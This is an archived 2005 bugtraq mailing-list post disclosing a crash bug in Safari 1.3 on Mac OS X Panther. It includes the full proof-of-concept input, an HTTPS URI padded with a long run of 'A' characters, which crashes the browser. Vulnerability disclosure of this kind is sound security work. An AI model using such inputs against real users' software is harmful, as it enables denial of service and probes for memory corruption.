[38668] in bugtraq

home help back first fref pref prev next nref lref last post

Safari HTTPS Overflow

daemon@ATHENA.MIT.EDU (Gilbert Verdian)
Thu Apr 28 20:48:00 2005

Mime-Version: 1.0 (Apple Message framework v728)
Content-Transfer-Encoding: 7bit
Message-Id: <5857F6B3-C1DF-4694-BE0B-5D85F0BE4133@neoresearch.org>
Content-Type: text/plain; charset=US-ASCII; delsp=yes; format=flowed
To: bugtraq@securityfocus.com, vuln-dev@securityfocus.com
From: Gilbert Verdian <gverdian@neoresearch.org>
Date: Fri, 29 Apr 2005 07:08:10 +1000

Found a bug in the latest Safari that comes with Panther 10.3.9 -  
Safari 1.3 (v312), previous versions of Panther are also vulnerable.

The problem is with the URI input for HTTPS which causes Safari to  
crash by inputting a large amount of A's i.e.

https:// 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Did a debug of the crash, but it kept crashing in a spin_lock while  
reading from the text segment. Will post more details when have more  
info on it.

Gilbert Verdian
neoresearch.org


home help back first fref pref prev next nref lref last post